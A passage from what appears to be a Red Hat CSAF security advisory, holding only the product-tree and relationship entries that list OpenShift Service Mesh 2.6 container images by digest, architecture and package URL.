"openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: 